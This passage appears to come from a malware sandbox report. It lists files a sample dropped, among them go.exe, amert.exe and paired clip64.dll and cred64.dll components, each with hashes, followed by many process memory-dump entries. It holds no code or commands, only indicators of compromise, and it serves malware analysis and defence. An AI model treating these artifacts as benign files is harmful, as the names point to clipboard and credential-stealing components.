          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\1000044001\go.exe
          Filesize

          894KB

          MD5

          2f8912af892c160c1c24c9f38a60c1ab

          SHA1

          d2deae508e262444a8f15c29ebcc7ebbe08a3fdb

          SHA256

          59ff8e0aa665fbbf749c7548906a655cb1869bb58a3b7546efa5b416d19e6308

          SHA512

          0395383bde98d358b0a7f2224f903dff026ce0c6d90feb49ac0e6993ef692143b0eb25da84d9cdc9e7b373a7b75a6dbaef14746eda1bff165d59f07ca51a16bb

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\1000046001\amert.exe
          Filesize

          1.8MB

          MD5

          ca4eb9bbe0d1b41789bb6b73eb4849f2

          SHA1

          27423ac1055b7ecf48a558cb7e460261e8191a60

          SHA256

          3bb6ca0c43e0cfcff8eef291737bd65417b056276c2679af92e14007aa1e3609

          SHA512

          de37665e75691154ca3935d18c8113b9b31374a3a82c41e28e93825efe3091895ce48ad1695623a932ee7f2307c83545628aa6f55ddbe352724f7117520212d2

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_snp0esqe.uof.ps1
          Filesize

          1B

          MD5

          c4ca4238a0b923820dcc509a6f75849b

          SHA1

          356a192b7913b04c54574d18c28d46e6395428ab

          SHA256

          6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

          SHA512

          4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

          Download Submit

        • C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll
          Filesize

          109KB

          MD5

          2afdbe3b99a4736083066a13e4b5d11a

          SHA1

          4d4856cf02b3123ac16e63d4a448cdbcb1633546

          SHA256

          8d31b39170909595b518b1a03e9ec950540fabd545ed14817cac5c84b91599ee

          SHA512

          d89b3c46854153e60e3fa825b394344eee33936d7dbf186af9d95c9adae54428609e3bf21a18d38fce3d96f3e0b8e4e0ed25cb5004fbe288de3aef3a85b1d93f

          Download Submit

        • C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll
          Filesize

          1.2MB

          MD5

          92fbdfccf6a63acef2743631d16652a7

          SHA1

          971968b1378dd89d59d7f84bf92f16fc68664506

          SHA256

          b4588feacc183cd5a089f9bb950827b75df04bd5a6e67c95ff258e4a34aa0d72

          SHA512

          b8ea216d4a59d8858fd4128abb555f8dcf3acca9138e663b488f09dc5200db6dc11ecc235a355e801145bbbb44d7beac6147949d75d78b32fe9cfd2fa200d117

          Download Submit

        • C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\clip64.dll
          Filesize

          109KB

          MD5

          726cd06231883a159ec1ce28dd538699

          SHA1

          404897e6a133d255ad5a9c26ac6414d7134285a2

          SHA256

          12fef2d5995d671ec0e91bdbdc91e2b0d3c90ed3a8b2b13ddaa8ad64727dcd46

          SHA512

          9ea82e7cb6c6a58446bd5033855947c3e2d475d2910f2b941235e0b96aa08eec822d2dd17cc86b2d3fce930f78b799291992408e309a6c63e3011266810ea83e

          Download Submit

        • C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll
          Filesize

          1.2MB

          MD5

          15a42d3e4579da615a384c717ab2109b

          SHA1

          22aeedeb2307b1370cdab70d6a6b6d2c13ad2301

          SHA256

          3c97bb410e49b11af8116feb7240b7101e1967cae7538418c45c3d2e072e8103

          SHA512

          1eb7f126dccc88a2479e3818c36120f5af3caa0d632b9ea803485ee6531d6e2a1fd0805b1c4364983d280df23ea5ca3ad4a5fca558ac436efae36af9b795c444

          Download Submit

        • memory/688-488-0x000001F5E8910000-0x000001F5E8912000-memory.dmp

          Filesize

          8KB

          Download

        • memory/688-509-0x000001F5E8DB0000-0x000001F5E8DB2000-memory.dmp

          Filesize

          8KB

          Download

        • memory/688-496-0x000001F5E8D80000-0x000001F5E8D82000-memory.dmp

          Filesize

          8KB

          Download

        • memory/688-499-0x000001F5E8D90000-0x000001F5E8D92000-memory.dmp

          Filesize

          8KB

          Download

        • memory/688-376-0x000001F5E7D00000-0x000001F5E7E00000-memory.dmp

          Filesize

          1024KB

          Download

        • memory/688-287-0x000001F5E7200000-0x000001F5E7300000-memory.dmp

          Filesize

          1024KB

          Download

        • memory/688-280-0x000001F5E6D00000-0x000001F5E6D20000-memory.dmp

          Filesize

          128KB

          Download

        • memory/688-401-0x000001F5E6810000-0x000001F5E6812000-memory.dmp

          Filesize

          8KB

          Download

        • memory/688-407-0x000001F5E6320000-0x000001F5E6340000-memory.dmp

          Filesize

          128KB

          Download

        • memory/688-235-0x000001F5E6D20000-0x000001F5E6E20000-memory.dmp

          Filesize

          1024KB

          Download

        • memory/688-490-0x000001F5E88D0000-0x000001F5E88D2000-memory.dmp

          Filesize

          8KB

          Download

        • memory/688-514-0x000001F5E8DD0000-0x000001F5E8DD2000-memory.dmp

          Filesize

          8KB

          Download

        • memory/800-250-0x0000000004DD0000-0x0000000004DD1000-memory.dmp

          Filesize

          4KB

          Download

        • memory/800-248-0x0000000001290000-0x0000000001291000-memory.dmp

          Filesize

          4KB

          Download

        • memory/800-423-0x00000000012A0000-0x000000000174F000-memory.dmp

          Filesize

          4.7MB

          Download

        • memory/800-206-0x00000000012A0000-0x000000000174F000-memory.dmp

          Filesize

          4.7MB

          Download

        • memory/800-254-0x0000000001280000-0x0000000001281000-memory.dmp

          Filesize

          4KB

          Download

        • memory/800-256-0x0000000004DC0000-0x0000000004DC1000-memory.dmp

          Filesize

          4KB

          Download

        • memory/800-259-0x00000000012A0000-0x000000000174F000-memory.dmp

          Filesize

          4.7MB

          Download

        • memory/800-253-0x0000000000FF0000-0x0000000000FF1000-memory.dmp

          Filesize

          4KB

          Download

        • memory/800-356-0x0000000004DF0000-0x0000000004DF1000-memory.dmp

          Filesize

          4KB

          Download

        • memory/800-371-0x0000000004DE0000-0x0000000004DE1000-memory.dmp

          Filesize

          4KB

          Download

        • memory/800-246-0x00000000018E0000-0x00000000018E1000-memory.dmp

          Filesize

          4KB

          Download

        • memory/800-240-0x00000000018D0000-0x00000000018D1000-memory.dmp

          Filesize

          4KB

          Download

        • memory/1528-169-0x00000187CE620000-0x00000187CE621000-memory.dmp

          Filesize

          4KB

          Download

        • memory/1528-168-0x00000187CE610000-0x00000187CE611000-memory.dmp

          Filesize

          4KB

          Download

        • memory/1528-102-0x00000187C62F0000-0x00000187C62F2000-memory.dmp

          Filesize

          8KB

          Download

        • memory/1528-67-0x00000187C7020000-0x00000187C7030000-memory.dmp

          Filesize

          64KB

          Download

        • memory/1528-83-0x00000187C7220000-0x00000187C7230000-memory.dmp

          Filesize

          64KB

          Download

        • memory/2188-48-0x0000000000D10000-0x00000000014B8000-memory.dmp

          Filesize

          7.7MB

          Download

        • memory/2188-47-0x0000000000D10000-0x00000000014B8000-memory.dmp

          Filesize

          7.7MB

          Download

        • memory/2188-44-0x0000000000D10000-0x00000000014B8000-memory.dmp

          Filesize

          7.7MB

          Download

        • memory/2188-350-0x0000000000D10000-0x00000000014B8000-memory.dmp

          Filesize

          7.7MB

          Download

        • memory/2188-45-0x0000000000D10000-0x00000000014B8000-memory.dmp

          Filesize

          7.7MB

          Download

        • memory/2188-46-0x0000000000D10000-0x00000000014B8000-memory.dmp

          Filesize

          7.7MB

          Download

        • memory/2188-52-0x0000000000D10000-0x00000000014B8000-memory.dmp

          Filesize

          7.7MB

          Download

        • memory/2188-51-0x0000000000D10000-0x00000000014B8000-memory.dmp

          Filesize

          7.7MB

          Download

        • memory/2188-50-0x0000000000D10000-0x00000000014B8000-memory.dmp

          Filesize

          7.7MB

          Download

        • memory/2188-49-0x0000000000D10000-0x00000000014B8000-memory.dmp

          Filesize

          7.7MB

          Download

        • memory/3616-6-0x0000000004F50000-0x0000000004F51000-memory.dmp

          Filesize

          4KB

          Download

        • memory/3616-2-0x0000000000B80000-0x0000000001036000-memory.dmp

          Filesize

          4.7MB

          Download

        • memory/3616-7-0x0000000004EF0000-0x0000000004EF1000-memory.dmp

          Filesize

          4KB

          Download

        • memory/3616-8-0x0000000004F00000-0x0000000004F01000-memory.dmp

          Filesize

          4KB

          Download

        • memory/3616-9-0x0000000004F40000-0x0000000004F41000-memory.dmp

          Filesize

          4KB

          Download

        • memory/3616-12-0x0000000004F60000-0x0000000004F61000-memory.dmp

          Filesize

          4KB

          Download

        • memory/3616-1-0x0000000077694000-0x0000000077695000-memory.dmp

          Filesize

          4KB

          Download

        • memory/3616-5-0x0000000004F10000-0x0000000004F11000-memory.dmp

          Filesize

          4KB

          Download

        • memory/3616-4-0x0000000004F30000-0x0000000004F31000-memory.dmp

          Filesize

          4KB

          Download

        • memory/3616-19-0x0000000000B80000-0x0000000001036000-memory.dmp

          Filesize

          4.7MB

          Download

        • memory/3616-11-0x0000000004F70000-0x0000000004F71000-memory.dmp

          Filesize

          4KB

          Download

        • memory/3616-0-0x0000000000B80000-0x0000000001036000-memory.dmp

          Filesize

          4.7MB

          Download

        • memory/3616-3-0x0000000004F20000-0x0000000004F21000-memory.dmp

          Filesize

          4KB

          Download

        • memory/4340-560-0x0000025DB8790000-0x0000025DB87A0000-memory.dmp

          Filesize

          64KB

          Download

        • memory/4340-534-0x0000025DB8980000-0x0000025DB89F6000-memory.dmp

          Filesize

          472KB

          Download

        • memory/4340-522-0x0000025DB87D0000-0x0000025DB87F2000-memory.dmp

          Filesize

          136KB

          Download

        • memory/4340-573-0x0000025DB8960000-0x0000025DB8972000-memory.dmp

          Filesize

          72KB

          Download

        • memory/4340-586-0x0000025DB8950000-0x0000025DB895A000-memory.dmp

          Filesize

          40KB

          Download

        • memory/4340-594-0x00007FFE05810000-0x00007FFE061FC000-memory.dmp

          Filesize

          9.9MB

          Download

        • memory/4340-506-0x0000025DB8790000-0x0000025DB87A0000-memory.dmp

          Filesize

          64KB

          Download

        • memory/4340-503-0x00007FFE05810000-0x00007FFE061FC000-memory.dmp

          Filesize

          9.9MB

          Download

        • memory/4340-508-0x0000025DB8790000-0x0000025DB87A0000-memory.dmp

          Filesize

          64KB

          Download

        • memory/4492-31-0x0000000004A50000-0x0000000004A51000-memory.dmp

          Filesize

          4KB

          Download

        • memory/4492-20-0x0000000000E80000-0x0000000001336000-memory.dmp

          Filesize

          4.7MB

          Download

        • memory/4492-29-0x0000000004A30000-0x0000000004A31000-memory.dmp

          Filesize

          4KB

          Download

        • memory/4492-28-0x00000000049F0000-0x00000000049F1000-memory.dmp

          Filesize

          4KB

          Download

        • memory/4492-27-0x00000000049E0000-0x00000000049E1000-memory.dmp

          Filesize

          4KB

          Download

        • memory/4492-26-0x0000000004A40000-0x0000000004A41000-memory.dmp

          Filesize

          4KB

          Download

        • memory/4492-25-0x0000000004A00000-0x0000000004A01000-memory.dmp

          Filesize

          4KB

          Download

        • memory/4492-24-0x0000000004A20000-0x0000000004A21000-memory.dmp

          Filesize

          4KB

          Download

        • memory/4492-23-0x0000000004A10000-0x0000000004A11000-memory.dmp

          Filesize

          4KB

          Download

        • memory/4492-22-0x0000000000E80000-0x0000000001336000-memory.dmp

          Filesize

          4.7MB

          Download

        • memory/4492-30-0x0000000004A60000-0x0000000004A61000-memory.dmp

          Filesize

          4KB

          Download

        • memory/4492-238-0x0000000000E80000-0x0000000001336000-memory.dmp

          Filesize

          4.7MB

          Download

        • memory/4492-352-0x0000000000E80000-0x0000000001336000-memory.dmp

          Filesize

          4.7MB

          Download

        • memory/4492-183-0x0000000000E80000-0x0000000001336000-memory.dmp

          Filesize

          4.7MB

          Download

        • memory/4700-160-0x000001D1E1900000-0x000001D1E1902000-memory.dmp

          Filesize

          8KB

          Download

        • memory/4700-158-0x000001D1E18F0000-0x000001D1E18F2000-memory.dmp

          Filesize

          8KB

          Download

        • memory/4700-155-0x000001D1E15F0000-0x000001D1E15F2000-memory.dmp

          Filesize

          8KB

          Download

        • memory/5368-706-0x0000000005110000-0x0000000005111000-memory.dmp

          Filesize

          4KB

          Download

        • memory/5368-705-0x0000000005170000-0x0000000005171000-memory.dmp

          Filesize

          4KB

          Download

        • memory/5368-692-0x0000000000E80000-0x0000000001336000-memory.dmp

          Filesize

          4.7MB

          Download

        • memory/5368-702-0x0000000005140000-0x0000000005141000-memory.dmp

          Filesize

          4KB

          Download

        • memory/5368-703-0x0000000005150000-0x0000000005151000-memory.dmp

          Filesize

          4KB

          Download

        • memory/5368-701-0x0000000000E80000-0x0000000001336000-memory.dmp

          Filesize

          4.7MB

          Download

        • memory/5368-708-0x0000000005160000-0x0000000005161000-memory.dmp

          Filesize

          4KB

          Download

        • memory/5368-707-0x0000000005120000-0x0000000005121000-memory.dmp

          Filesize

          4KB

          Download

        • memory/5368-704-0x0000000005130000-0x0000000005131000-memory.dmp

          Filesize

          4KB

          Download

        • memory/5376-699-0x0000000005540000-0x0000000005541000-memory.dmp

          Filesize

          4KB

          Download

        • memory/5376-700-0x0000000005530000-0x0000000005531000-memory.dmp

          Filesize

          4KB

          Download

        • memory/5376-696-0x0000000005560000-0x0000000005561000-memory.dmp

          Filesize

          4KB

          Download

        • memory/5376-697-0x0000000005580000-0x0000000005581000-memory.dmp

          Filesize

          4KB

          Download

        • memory/5376-709-0x00000000055B0000-0x00000000055B1000-memory.dmp

          Filesize

          4KB

          Download

        • memory/5376-695-0x0000000005550000-0x0000000005551000-memory.dmp

          Filesize

          4KB

          Download

        • memory/5376-694-0x0000000000BF0000-0x000000000109F000-memory.dmp

          Filesize

          4.7MB

          Download

        • memory/5376-693-0x0000000000BF0000-0x000000000109F000-memory.dmp

          Filesize

          4.7MB

          Download

        • memory/5376-698-0x0000000005520000-0x0000000005521000-memory.dmp

          Filesize

          4KB

          Download

        We care about your privacy.

        This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.